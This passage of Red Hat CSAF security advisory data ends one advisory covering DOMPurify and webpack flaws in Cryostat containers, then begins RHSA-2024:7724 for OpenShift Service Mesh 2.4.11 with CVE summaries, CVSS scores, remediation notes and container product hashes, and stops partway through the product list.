"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-45801", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-16T19:20:09.863249+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2312631", }, ], notes: [ { category: "description", text: "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.", title: "Vulnerability description", }, { category: "summary", text: "dompurify: XSS vulnerability via prototype pollution", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45801", }, { category: "external", summary: "RHBZ#2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45801", url: "https://www.cve.org/CVERecord?id=CVE-2024-45801", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", url: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", url: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", url: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", }, ], release_date: "2024-09-16T19:16:11.080000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T01:12:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L", version: "3.1", }, products: [ "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64", "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64", "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "dompurify: XSS vulnerability via prototype pollution", }, ], }
RHSA-2024:7724
Vulnerability from csaf_redhat
Published
2024-10-07 09:22
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.4.11
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.4.11\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7724", url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7724.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11", tracking: { current_release_date: "2025-04-10T00:21:23+00:00", generator: { date: "2025-04-10T00:21:23+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7724", initial_release_date: "2024-10-07T09:22:37+00:00", revision_history: [ { date: "2024-10-07T09:22:37+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:22:37+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:23+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.4 for RHEL 8", product: { name: "RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.4::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: 